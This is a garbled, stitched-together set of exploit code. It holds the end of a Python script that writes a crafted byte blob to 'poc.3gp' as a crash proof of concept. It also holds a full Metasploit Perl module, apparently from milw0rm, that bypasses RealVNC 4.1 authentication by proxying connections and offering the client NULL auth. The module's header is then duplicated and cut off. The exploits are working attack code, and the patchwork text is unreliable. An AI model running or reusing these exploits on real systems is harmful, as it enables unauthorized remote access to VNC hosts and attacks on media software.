\xB9\x83\xF5\x64\x62\xAB\x6D\xDB\xA6\xF7\x24\xD8\xAF\x7D\xF7\xCB\x0D\x48\xA0\xF2\xB4\xCE\x1B\xF9\x31\x3B\xEE\xB3\xA5\x59
\x29\x84\xAE\x7F\xFF\x7F\x00\x00\x01\xB6\x52\xC2\x27\xFF\xBA\xB8\x37\x2A\xC3\x70\xD9\x3F\x2B\x45\x2C\x11\xB8\x57\x70
\xDD\x52\x6B\x9E\xDE\x9E\x75\x71\x37\x15\x4C\x68\x32\x59\x42\x87\x15\xEF\xA9\xB4\x18\x8C\x94\xCD\x96\xA1\xC1\x83\xD9\xD0
\x4D\x09\x64\x15\xAF\xEB\x02\xC2\x42\xC1\xEA\x17\x0A\x4D\x2A\x74\xA2\xEF\x5B\x01\x2C\x6C\x13\x2E\x93\x64\x83\x34\xCD\xB5
\x0D\xC9\x26\x6C\xBB\x2F\xC7\xA2\x9E\x16\x08\xF8\x94\xDF\x17\x6B\xF6\xA8\x58\x46\xE3\xCC\x73\x65\xF3\xE0\xA2\xA9
\xDE\xDE\x75\xB6\x86\xE5\x83\x31\x69\x32\xE6\x8B\xAD\xFC\x19\x2D\xCC\x59\xB1\x82\x98\x26\x48\xCA\x51\x76\xE2\xAC\x26\xF4
\xD4\x94\x94\x2B\x01\xA9\x34\xC4\x29\xC8\x56\xBD\xAD\xC1\x99\x13\x33\xF0\x16\xE6\x30\x8C\x14\x4C\xA4\x18\xCC\x12
\xBF\xDA\x3C\xAC\x0E\xF2\x14\x15\x9E\x7B\x12\xE9\xA7\x91\xBA\x39\x11\xCF\x83\x14\xFA\x8C\xD3\x24\x1C\x51\x7E\x08\xD2
\xCE\xF8\x2E\xB3\xDB\x00\xA5\x06\x1B\x0B\x08\x94\x34\xAD\xF9\x48\xE5\xD8\x4E\xC2\x8D\x67\x85\xA6\x8D\x31\x3F\xAB\x54\x07
\xBF\xFF\x13\x0A\xFB\x86\xA1\x61\xCB\x80\x53\xB9\x07\xF9\x53\x69\xB1\x31\x36\x18\x0F\x61\x7D\x87\xC8\xC6\x6C\x39\x21
\x1B\x19\x20\x31\xA5\x2A\x72\xC9\x90\xCD\x68\xD9\x93\x55\x10\x90\x25\xC5\x10\x7A\xDA\x91\xD2\x3F\x5D\x9F\x44\x7E\x51
\x1A\xED\xE3\x63\x45\xD4\x20\x8F\xFF\x04\x95\x4A\x95\x83\x33\xEE\x7D\x3A\xCF\x04\xBB\x82\x90\xC2\x14\x53\xF3\xA7\x67\x26
\xDE\x48\xDE\x84\x64\x57\x83\x2C\xA9\xC8\xD5\x0B\x73\xDB\x1B\xBB\xDE\x24\x31\x33\x04\x17\x94\xA6\x16\x81\xE1
\x3F\x7D\x5E\x0E\xB3\x6D\xE8\xCF\x86\x5D\xB2\xD5\x54\xB6\x52\x95\x48\x89\x89\x28\xB7\xD2\xA6\xB0\x8F\xFF\xEF\x00\x00\x01
\xB6\xE5\xE2\x27\xFF\xBA\xF5\x85\x26\x71\x77\x17\x71\x58\x16\x28\x9B\xBD\x43\x4F\x38\xA5\xB8\x4A\xF3\xF2\xBE\xE1
\xAE\x5E\xEA\xEA\xEA\xFB\x19\x3B\xED\x38\x84\x30\x75\xEF\xA9\x9C\x30\xAB\xE9\x9D\x34\x99\x8F\xD6\x6F\xAC\x5D\xCB\x40\x28
\xED\x3C\xBC\xF6\x68\x1C\x03\x88\x98\x3C\x49\x04\xCC\xDA\x98\xB4\x50\xA2\x3F\xFB\xC7\xE0\x89\xA4\x6B\x78\xD3\x9F\xB8
\xAE\x15\x6D\xC0\x49\x84\x6B\x50\xA9\x72\x03\x57\x81\x67\x25\x89\x68\xC0\xC8\x34\xA5\x8D\x72\x95\x14\xBF\xE5\xFE\x80
\x6D\x50\xEF\x37\xAD\x0B\x3F\x27\x47\x4F\x23\xA9\xCA\x72\x88\x8D\x72\xB0\xB1\xDF\x45\x99\x51\x29\x41\x60\xBC\x14\x56\x29
\xDF\xEF\x51\xF9\xB2\xC7\xA9\x03\x73\xEB\xEA\x0B\x14\xC1\x81\x9C\x35\x34\x47\x63\x0E\xA8\xCE\xD8\x95\xEA\xA8\x1B\x4B\x05
\xF2\xAB\x82\x52\x82\xFF\x88\xCA\x64\xFA\x4B\xCD\xA2\xF4\x4D\x3C\x4B\x12\x4B\x80\xF5\xDF\x74\xBB\xF3\x7D\x5B\x9D\x84\xE7
\xDD\x6E\x57\x73\xED\xD5\x29\x3B\x05\x21\x6B\xD5\x49\xBD\xD7\x2A\x57\x54\x00\x51\x1A\x35\x39\x16\xEA\x99\x77\xF9\x75
\x4C\x95\xB2\x3D\xFD\xCC\x8C\xFF\x89\x3C\x68\xCC\xBC\x45\x07\x0E\x25\xB6\x52\x5F\x76\x8F\x65\x59\x12\x22\x2A\x07\xE4\x95
\x55\x69\x5D\xF3\x6D\x6B\x88\xA1\xC2\x93\x4F\x9E\xB0\x0D\x5D\xCC\xC4\x89\x05\x98\x68\x52\xF9\xD2\x0C\x29\x90\x99\xB5
\x7A\x1F\x11\x9F\x34\xD2\xCE\x8C\x9A\xC4\x31\x83\x2A\x78\xE9\x2C\x13\x82\xF0\x4A\x09\x7B\xF0\x7B\xE5\x0C\x3E\x7B\xDE\xF6
\xA8\xE6\xF6\xF4\x73\xA3\x24\xB2\x6E\x41\xC3\x17\x90\xF1\xF3\x8E\xAD\xFB\xDD\x5A\x98\x94\x87\x20\x75\x1C\xE2\x80
\x2E\x8F\x21\xC8\xAB\x70\x76\x50\x2E\xAD\x9C\xFF\xEF\x00\x00\x01\xB6\x54\xC2\x67\xFF\xBA\xF2\x41\xC2\x22\x42\xB6\xC5\xC1
\x7B\x9C\x1B\xB8\xBA\xC1\x4C\x2A\x63\x97\x68\x8B\x41\x55\xA3\x07\x49\xA2\x9F\x38\x4B\x3B\xAD\x83\x0C\x8A\x17\xC2\x30
\x2B\x60\x21\x1A\x7A\xE8\xC2\x17\x63\x5B\xD4\x42\xD0\xA9\xB5\xC6\x2C\x05\x4E\x3A\x69\x93\xF7\x75\xB0\x1C\xA2\x36\x6E\x32
\x88\x58\x02\x0F\xB2\x77\xFC\xFA\xC8\x45\xCC\x5B\xBA\xDF\x95\x81\xAF\x81\x47\xA1\x38\x31\xA1\xBB\xC5\x2A\x81\xC1\x50\xD4
\x14\x2E\x0B\xD0\xD4\x58\x5B\x3E\x3A\xB2\x7C\x60\x34\x21\xCE\x61\x69\x84\xCC\xFD\xA4\x9B\x06\x5E\x1E\x97\x45\x34
\x7A\x0C\xD5\x8A\x48\x4A\x18\x3E\x86\x17\xF6\xC9\x9D\x6D\xA2\x52\x4E\x10\x0F\x92\xAC\x9A\xA4\x0B\x28\xC4\x22\xDD\x6C\xF2
\xFC\x58\x8F\xD5\x84\xA0\xC5\x0F\xDC\x19\x04\x3C\x2A\xAD\x1B\x51\x47\xED\x8D\xA8\xC8\x29\xB5\x65\x93\x41\x89\xD8\xE2\x12
\x13\x11\x8F\x95\xB6\xAB\x6B\x5F\x06\x38\x78\x7C\x24\xCB\x6F\xB1\x2A\x4E\xB9\x20\x59\xA7\x88\xF5\x6F\xB0\xFF\x6D\xB2
\x8E\x87\x7C\xE0\x88\xA4\x76\xD5\x2D\x21\x9C\xFC\x64\xF1\x1A\x4A\xD4\xBC\xD1\x70\x79\xC1\x56\x74\x34\x16\xA6\xAB\x21\x46
\x2D\xD6\xC1\x86\xA4\x23\x30\xB6\x4D\x05\x19\x65\xBE\x9E\xED\x97\xBE\xC1\xE8\xEF\xDE\x59\xCC\x05\x31\xF8\xFD\x57\xB2\x09
\x63\xE5\x72\x89\x56\xE6\x2C\xAE\xEF\x09\x2C\x70\xFB\x84\x5A\x0A\x14\xFC\x3E\x63\x6F\x98\xD3\x49\x30\xF4\x69\x8E\x23\xE3
\x63\x51\x82\xD6\x16\x25\x05\x13\xCF\x9E\x35\xC8\x98\x81\x64\x57\x73\xCA\x53\x9D\x33\x18\x72\xEE\xCB\xBD\x67\x66\x9C\xD1
\xDE\x64\x11\x95\xA9\xA0\x4F\xD6\x58\x52\x34\x97\x89\x05\xB1\x55\xA0\x44\x7B\xA0\x4A\xF8\x5A\x44\x45\x26\x20\xB3
\x3E\x5F\xF0\x34\x08\x6A\xF4\x47\x65\x65\x87\x1A\x63\xB2\x72\x01\xC6\x40\x83\x64\x44\xE8\x0E\x2A\xF0\xCF\x99\xF1\x09\xA9
\xC7\xB8\x33\x89\xE5\xDE\x9D\x77\x14\xF9\x22\x0E\xBF\x83\x90\x33\x86\xB8\x74\xE7\xF8\x98\x15\x67\xD6\x81\x51\x5D\x44\x10
\x73\x6F\x49\x0A\x5B\x70\xD2\x92\xF2\x03\x19\x64\x5B\xFF\x66\x7B\x5A\xCE\x13\x38\xB7\x6B\xDC\x34\xE9\xE6\x6A\xE4\x05\x61
\x01\x98\x90\xE3\xF5\xF6\xE8\xEE\x81\x31\xD8\x0F\x7B\xFF\xF7\x00\x00\x01\xB6\x55\xE2\x27\xFF\xBA\xF2\x4C\x54\x21\x15
\xDB\x1A\x5C\xF9\x1E\xB6\x4F\xCD\x11\x22\xD2\x06\xF3\x05\x4C\x09\x16\x81\x11\x59\xFB\x4E\x0A\x4E\x12\xFC\xFA\x82\x5D\x82
\x03\xD2\xF5\x00\xE4\xF1\x47\x62\x58\x5A\xE1\xBC\x28\x94\xE4\xDD\x66\xEC\x27\x1C\x16\x8C\xFA\x48\x34\x37\x54\xE7\xB2\x76
\x64\xCB\x4F\xAC\x47\xA2\xC3\x3D\xC2\x8F\x50\x61\x79\x2C\xA5\x2E\x74\x91\xA4\x4E\x4E\xE3\xBD\xF1\x92\x07\x5D\x60
\xEB\xDF\x05\x20\x15\x06\x28\x0C\xCD\xBC\xD1\x11\xFB\x74\x23\x25\xFB\xA3\x51\xA1\x9A\x71\xB9\x43\xA1\xF2\xC7\x7A\xB4\x90
\xF1\x0E\xE8\x39\xB0\x75\x13\xF6\x5C\xF7\x34\xB1\x73\xC3\x7D\x1A\x00\xB7\x30\x74\x69\x80\xA5\x65\xCA\xA5\xA0\x75\x03\x43
\x93\x4A\x79\xA7\x97\x94\x67\x02\xB5\xC8\x37\x15\x10\x77\xEF\xB6\xA9\x29\x43\xCF\x2A\xF8\x1B\x55\x00\xAD\x19\x19\xAD\x77
\x8F\x4C\x95\xDE\xE8\x19\xB3\x35\x64\x24\x3C\xC2\x54\xEC\x6F\x05\x61\xD1\x13\x12\xE2\x86\xB8\x29\xAC\x8B\x13\xA1\x67\x90
\x90\x8F\xD5\xC6\x46\x4A\xBA\xD8\x17\xE2\x07\x19\x36\x6C\xF9\x38\x88\x96\x14\x56\x9F\xDB\x97\x00\xE6\xCF\x2B\xA9\xB6
\x5E\x11\x17\x29\x1D\xFB\xD7\x85\xEC\xCC\x38\x43\x66\xC9\xB6\x6B\x4D\x02\x69\xF2\x41\x6F\x28\xF7\xD4\x46\x99
\x9A\xDB\x3E\x16\x40\x57\x9D\x07\x34\x72\x98\x2C\xD6\x9E\x06\x77\x02\xCE\x65\xED\x5C\x27\x5C\xF9\xBA\x4A\xB1\x89\x05
\xFF\xC9\x13\xED\x98\x8B\x76\x21\xA4\x6B\x7E\x53\x29\xA7\x81\xF7\x10\x99\x0D\x01\x7F\x55\x70\x98\xCB\xD1\x6A\x53\x46\xD3
\xF2\x08\x22\xC3\xAF\xB0\x66\x1A\xC5\x4B\xEC\xE9\xCF\xD9\x56\x21\x8B\x1F\x29\x18\x66\x61\x61\x80\xE1\x86\x7F\x0C\xE5
\x1E\xCD\x75\xE9\x59\x64\x38\x46\x9C\xA1\xC4\x0D\xEE\x81\x94\x4C\x1B\xEF\x79\xDC\xBF\xE8\x22\x0C\xD0\x3A\x70\xA0\x80\x89
\xA8\xFC\x16\xFF\xFA\x06\xD8\x2A\xBA\x52\xEE\x5C\x5E\x6A\x02\x16\xCA\x9C\x2A\x70\x52\x56\x28\x54\xCB\x3A\xE6\x49\x52\xE2
\x51\xAF\x12\x90\x8D\x08\x3D\x5B\x4E\x62\x33\x4D\x13\x14\xA5\xDD\xA4\xE8\x4E\x28\x29\x10\x8B\x0E\x0A\x07\x0B\x07\x67\x93
\x30\xE5\xC2\x40\x95\x7D\x6A\x8F\xDF\xCB\xD5\x04\xDB\x6B\x1E\xD6\xC0\x91\x2A\x44\x95\x01\xAE\x99\x29\x60\xF2\x0D\x06\x47
\x39\xC3\xEA\xE6\x72\x1E\x28\x6B\x77\x4E\x4A\x55\xCB\xE6\x27\xB5\x28\x60\x57\xCF\xC5\x8E\x9F\xFF\xBF\x00\x00\x01\xB6\x56
\xC2\x27\xFF\xFB\x01\x5F\xE8\xE8\x02\x37\x06\xF6\x02\x89\xCA\x05\x11\xFF\x00\x43\x82\x22\x46\x65\x36\xEE\x51\xA8\xCF\x84
\x6B\x22\x61\xCB\x03\x13\x0C\x00\xE7\x62\x70\xE4\xF0\xDB\x19\xD4\x2D\xA0\x9C\xFB\x4B\x0E\x9A\xA5\x5D\xF1\x97\xBB\x65
\x3F\x08\xDC\xE5\xF8\x2B\x8C\x3B\x78\x8D\xB8\x17\xF7\x9B\x56\x96\x03\xBC\xE3\x37\xA0\xAE\x3E\xF2\xDE\x34\x80\xF0\x56
\x9A\xD5\x3A\xB1\x02\x7E\x0D\x60\x57\x01\x3C\x0A\x4D\x02\xB9\x00\x68\xA8\x05\x83\x28\x9A\x3C\x54\x06\x6F\xBD\xA9\x7E\xE8
\x40\x6D\x13\x05\xC6\xCE\x04\x12\xE9\xE8\x25\x0F\x2F\x94\xA9\xAD\x08\xBC\x64\x02\x79\xDF\xE3\x4C\x21\x7A\xC8\x0D\x97
\x5A\x07\x15\xAF\xEF\x5A\x34\x27\xF1\x87\xE5\x11\x9E\x08\x4A\x3F\xFF\x89\x7B\x64\x1F\xA8\x51\x91\x30\x50\xBB\x12\x62\x24
\xC0\x51\xD9\xB6\x14\x85\x0D\x04\x39\x5E\x86\xA4\x9E\x1C\xD2\xC8\xF2\x2E\x61\x38\x1E\x05\x20\xC7\xEC\x12\x88\x63\x00
\x8F\x43\x57\xD1\xB2\xFC\xEA\x32\x05\xA6\x46\x4A\x91\x48\xBA\xC2\xA4\x5E\xA3\x59\xC5\x2B\x90\x5A\x66\x8D\x25\x8D\xC1\x98
\x37\x7E\x07\xBE\xD0\x16\xF3\x2D\x29\xFE\xD4\xC4\x50\xB0\x50\x5C\xDF\xBD\x60\x29\x95\x75\x7E\x15\x9E\x05\x37\x67\x2E\x01
\xB1\x71\x75\x54\x07\x2F\x89\xE6\xA8\xF1\x62\x13\x92\x41\x19\x36\x15\x1E\x5C\xF9\x1B\xAB\x51\xFA\x72\x0F\x20\x89
\x9E\x1A\x73\x9B\xA4\x8B\x83\x10\xEC\x6D\x43\x0F\x5D\x05\xBB\xDE\x99\x24\x59\xCC\x30\x33\xED\xD6\x1F\x3E\x44\x68\xC9\xA1
\x3E\x71\x72\x13\x33\x98\x69\x67\xCE\x95\x8D\xB8\xE0\xA4\x87\x86\x2F\x9B\x37\x16\x6C\x2C\x1A\x8E\x94\x8E\x9A\x25\x4C\x28
\x2B\xC7\x80\x32\x83\x0E\x8B\xC7\xAA\x15\xD5\x3C\xE2\x9F\xB7\x63\x02\x37\xB2\xBE\xF3\xC2\x31\xAF\x7E\xA9\xAA\x31
\x1A\xDF\x6C\xE8\x47\x94\x6F\xC3\x99\xAD\x29\xE7\x4D\x23\x3C\x9B\x5E\x2C\x6B\x3C\x8E\x64\xE1\xD4\x87\x19\x7E\x20\xA1\xE1
\xE8\xEA\xFC\x37\xD0\xAA\x31\x1C\x68\x34\x1C\x30\x47\x07\x72\x70\xC4\x20\x9F\x95\x8C\xE9\x43\xA5\xCF\x3C\x88\xD9\x23\x92
\xC6\xE0\xB6\xDB\xF9\x65\x94\x46\x66\x11\x01\xCF\xE5\xFA\x8F\xD9\x59\xCE\x0C\x97\x47\xBA\xA5\x14\x1A\x9F\x58\x0D\x03\x30
\xDF\x16\xDE\x69\x13\x83\x36\xB3\xA7\x21\xDA\x4C\x32\xF7\x60\x1A\x3C\x45\xF9\x99\x81\x64\x65\x87\x70\x46\x44\x7F\x8C\x31
\x0D\x14\xFC\xC8\xC9\x33\x5C\x90\x29\xE1\xD0\x84\x5E\x07\xA4\x56\x3D\xB6\xC5\x6C\x72\x61\x8F\x55\x5E\x57\x65\x57\xE5
\x2A\x1A\x53\xDC\x1A\x84\x7A\xAA\xB6\x2D\x99\x3E\xA1\x05\xBD\xD0\x76\x91\x25\xAA\x7B\x0F\x0A\x94\x61\x33\x51\x86\x82\x97
\x85\x4E\xC2\x83\x57\x8E\x2F\x03\x68\x1D\x03\xA7\x12\x2B\x1A\x31\x4E\x73\x26\xA9\xCE\xC6\x93\x11\x36\x23\xD7
\xBC\xFF\xFD\x01\x40\x40\x06\xF7\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\xF0\xBB\xA4\x3E\x0F\x87\x90
\x82\x6F\xE0\x03\x76\x08\x08\x15\x56\x73\x3E\x2C\xFD\xA0\x23\x9E\x24\xC7\x0A\xA0\x41\x1C\x29\x62\x94\xA6\x0C\x5C\xC3
\x1F\x78\x9F\xC3\x8F\x0F\xC7\x38\x84\x2E\x9F\xF1\xA9\xE6\x0D\x16\xEC\xBF\xF2\xAB\x21\x5C\x7D\xD7\x04\x70\xA9\x7A\x2F\x03
\xFA\xE5\xE1\x0B\x1F\x6F\x3F\x1C\x8E\x32\x04\x2F\x54\x26\x78\x50\x2F\x9D\xDD\x5F\x8D\x0F\x14\xB3\xAC\x63\x45\x86\x88\x48
\xF4\xB6\x84\xDF\x8D\x86\x88\x51\xD5\x3A\x7F\xE9\x14\xD7\x05\xCD\x19\x97\xD1\xA2\xF1\xDD\x31\x1F\x35\x30\xB6\x97\x76
\xEF\x62\x6E\xCE\x99\xD9\x5A\xA3\xC5\x27\xBC\x20\x1D\x01\x1E\xBA\xD8\xBE\xA6\x8D\x92\x13\x90\xDA\x41\x44\x49\x0B\x72\x54
\x00\xBC\x7F\x5E\xF0\xDE\xB5\x40\xC4\x17\x42\x6D\xC6\xC9\x28\x15\x4D\x9C\x04\x05\xF1\x1A\xCD\xF3\x32\x5F\xBC\x0A\x70
\x1A\x48\x2F\x30\x0F\x96\x7D\xA3\x45\xE0\xB5\x67\x49\x6B\x4D\x85\x78\x5E\x01\x97\x03\x11\xBB\xDA\x42\x04\x43\xF0\x35
\x6C\x0C\x37\x81\x1A\x98\xD9\xC3\x9E\xAE\xA6\x6E\xAB\xAB\xD8\xA4\x64\x28\x70\x74\x3E\xB0\x6E\x31\x6D\xF5\x51\xA8\xF5\x36
\xD7\x2B\x97\x74\x0B\x4B\x5A\x75\xD0\x6F\x64\x23\xAB\xC5\x6F\x05\xA4\x74\xF7\xA2\xBC\x08\x75\x47\x58\xF0\x78\x12\x67\xA8
\x2F\x32\xC7\x78\x57\x1D\xFA\x36\xB6\x32\xD4\xFC\xD4\xFA\xC4\x00\x57\x8C\xAB\x09\xF7\xC8\x98\xC0\x12\xCF\xB0\xDD\xA6\x60
\xCA\xD5\x1A\x61\xAD\x41\xF6\xEE\xF8\x22\x60\x60\x12\xBF\x69\x57\x9A\x70\x01\x2D\x1A\x0D\x19\x26\x1E\xB6\xF3\x59\x93\x30
\x2D\xF8\x70\x58\x9F\xF6\x6F\xA5\x3B\x5D\xC4\x1C\x16\x58\xD2\xAA\xBD\x01\x4E\xD5\xA2\x08\xD6\x12\x0C\x52\x6F\x9D\x0C\x55
\xEF\x41\x56\x30\x02\xD2\x05\x00\x50\x3C\xDC\x43\x64\x46\x40\xB7\x91\x47\x34\xA3\x3C\x8A\xDC\xC9\xD6\xA4\x42\x0F\x40\xA3
\x91\x78\x85\x88\x4A\x79\x11\x13\x43\x37\xCC\xE3\x40\x60\xC3\xB3\x6C\xFB\x9D\x26\xEB\x8F\x1A\xAE\xB9\xA4\x00\xE0\x07\xF9
\xDF\x62\x2B\xE7\xC9\x4B\x1D\x77\xD9\x2B\x1B\x47\x89\x6C\x84\xBD\x89\x1C\xE4\x23\x7A\xE7\xB9\xD8\xCA\x6A\x17\x68\x88
\xCF\x0A\x16\x82\x49\x7B\x8E\x83\xD9\x1E\xC5\x54\x44\x9A\x33\x69\x4D\xC7\x6C\xE4\xD2\xC9\xF8\x1B\xFB\x63\x79\xE8
\x9A\xEB\xFE\x73\xE8\xE0\x5A\xF8\x61\xEE\xB4\xE7\x3F\x4E\x0D\xBA\x11\x9F\xBD\xB6\xD7\xF2\xA6\xC9\xF7\xCE\xF8\x6C\x4E\x93
\xBE\x0E\xB0\x51\x49\xC6\x9F\x2C\xDB\x10\xF3\x46\xB8\xFC\x7C\xED\x30\x3F\x01\x50\x15\xA4\x8C\xA5\x3A\x26\x02\x43\x34\xB1
\x80\x5D\xFC\xC5\x3C\x8A\x00\xBC\x0B\x00\x4E\xEE\x2E\xC3\xE6\xB5\xAF\xC7\x49\x53\xFB\xB9\x80\x61\xFA\xF1\xB5\x33\x07
\xBD\xD0\x28\xA9\x0A\x97\x2B\xE3\xD4\x15\x58\x9D\xE3\x31\xD5\xC8\xA4\x7D\xD3\xAE\x29\xB1\xCB\x0E\xEA\x84\x57\xA9\x86\xF2
\xB2\x1F\xC5\xF8\x11\xF4\x53\xE7\x6F\xE1\x36\x73\x12\xDB\x6B\x3A\xF7\xE4\xF8\x59\x74\x84\x12\x93\x5A\x9D\x3A\x16\xCF\xB9
\xC3\x33\x4C\x7E\x54\x10\x77\x2D\x41\x11\x48\x0F\xA0\x77\xF1\xE8\x56\x09\x93\xDA\x13\x67\x4F\x5A\xA4\x67\x6B\x8B\xEA\x86
\x2C\x44\x10\x53\x12\xD1\x61\x55\x7B\x68\x02\x78\x26\x11\x67\x9F\xF5\x77\x55\xB5\xA7\x4E\xC3\x36\xBE\xC5\x4E\x7D\xE9\xD5
\xCB\x48\x07\x01\x52\x15\x9D\x14\x66\x11\xA9\x08\xC2\x35\xAA\x50\x03\x00\x06\xEC\x05\xB1\x60\x23\x5B\x5B\x3D\x67\x75
\xED\x1E\x8E\xF4\x3D\x70\x22\x43\xA9\x72\xB0\x1C\x8C\x1C\x42\x79\x22\x8E\xD3\xB8\x05\x1A\xA1\x1D\x0E\x9F\x31\x6D\x2D\x59
\xF9\x4D\x04\xEE\xDD\xD5\x7A\xB8\x7D\xEC\xA6\x65\x7C\xEB\x40\x53\xF9\xF3\xD7\xBD\xAF\xF5\xBF\x27\xB5\xDC\x53\xB6\x3D\x68
\x53\xCE\xE3\xD9\x4E\x14\x29\x29\x24\x1C\x20\x4A\xE0\xDC\x33\x25\xC9\xB2\x75\x22\xE2\xEC\x76\x0E\x38\x96\x6B\xE8\x89\xC0
\x50\x9D\x03\x5A\x00\x5E\x71\xCF\x61\x74\xC5\x55\x01\x4A\xC7\x30\x5D\xAD\xEA\x60\x0E\xAD\xC7\x3B\xC6\xED\xCE\x40\x0E\x01
\x4E\x15\x99\x56\x15\x31\x25\x4E\x2A\x66\x52\xD2\xCF\x7C\x0E\x80\xC0\x4A\x03\x52\x94\x02\x9D\x98\xE6\x45\xA8\x02
\x9C\xBA\x7C\xFA\x25\xB2\x00\x59\x1D\x59\x76\x47\xD9\x6A\xDC\x26\xE8\xB7\x68\x76\x44\x8C\x3D\xFB\xC7\x42\x07\xE8\x63"
outfile = file("poc.3gp", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"


@ -1,214 +1,213 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::realvnc_41_bypass;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced = {};
my $info =
{
'Name' => 'RealVNC 4.1 Authentication Bypass',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an authentication bypass flaw in version
4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
between a VNC client and a vulnerable server. Credit for this should
go to James Evans, who spent the time to figure this out after RealVNC
released a binary-only patch.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],
'LHOST' => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0" ],
'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],
'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],
'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
},
'Refs' =>
[
['URL', 'http://secunia.com/advisories/20107/']
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'RealVNC' ],
],
'Keys' => [ 'realvnc' ],
'DisclosureDate' => 'May 15 2006',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('LHOST'),
LocalPort => $self->GetVar('LPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
my $client;
# Did the listener create fail?
if (not defined($server))
{
$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
return;
}
if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
if (! fork()) {
system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
exit(0);
}
}
$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");
while (defined($client = $server->accept()))
{
$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
# Stolen from InjectVNCStage.pm
sub HandleVNCClient
{
my $self = shift;
my ($fd) = @{{@_}}{qw/fd/};
my $rhost;
my $rport;
# Set the remote host information
($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Create a connection to the target system
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
$fd->Close;
return;
}
my $res = $s->Recv(-1, 5);
# Hello from server
if ($res !~ /^RFB 003\.008/) {
$self->PrintLine("[*] The remote VNC service is not vulnerable");
$fd->Close;
$s->Close;
return;
}
# Send it to the client
$fd->Send($res);
# Hello from client
$res = $fd->Recv(-1, 5);
if ($res !~ /^RFB /) {
$self->PrintLine("[*] The local VNC client appears to be broken");
$fd->Close;
$s->Close;
return;
}
# Send it to the server
$s->Send($res);
# Read the authentication methods from the server
$res = $s->Recv(-1, 5);
# Tell the client that the server only supports NULL auth
$fd->Send("\x01\x01");
# Start pumping data between the client and server
if (! fork()) {
$self->PrintLine("[*] Proxying data between the connections...");
$self->VNCProxy($s->Socket, $fd->Socket);
exit(0);
}
return;
}
sub VNCProxy {
my $self = shift;
my $srv = shift;
my $cli = shift;
foreach ($srv, $cli) {
$_->blocking(1);
$_->autoflush(1);
}
my $selector = IO::Select->new($srv, $cli);
LOOPER:
while(1) {
my @ready = $selector->can_read;
foreach my $ready (@ready) {
if($ready == $cli) {
my $data;
$cli->recv($data, 8192);
last LOOPER if (! length($data));
last LOOPER if(!$srv || !$srv->connected);
eval { $srv->send($data); };
last LOOPER if $@;
}
elsif($ready == $srv) {
my $data;
$srv->recv($data, 8192);
last LOOPER if(!length($data));
last LOOPER if(!$cli || !$cli->connected);
eval { $cli->send($data); };
last LOOPER if $@;
}
}
}
}
1;
# milw0rm.com [2006-05-15]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::realvnc_41_bypass;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced = {};
my $info =
{
'Name' => 'RealVNC 4.1 Authentication Bypass',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an authentication bypass flaw in version
4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
between a VNC client and a vulnerable server. Credit for this should
go to James Evans, who spent the time to figure this out after RealVNC
released a binary-only patch.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],
'LHOST' => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0" ],
'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],
'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],
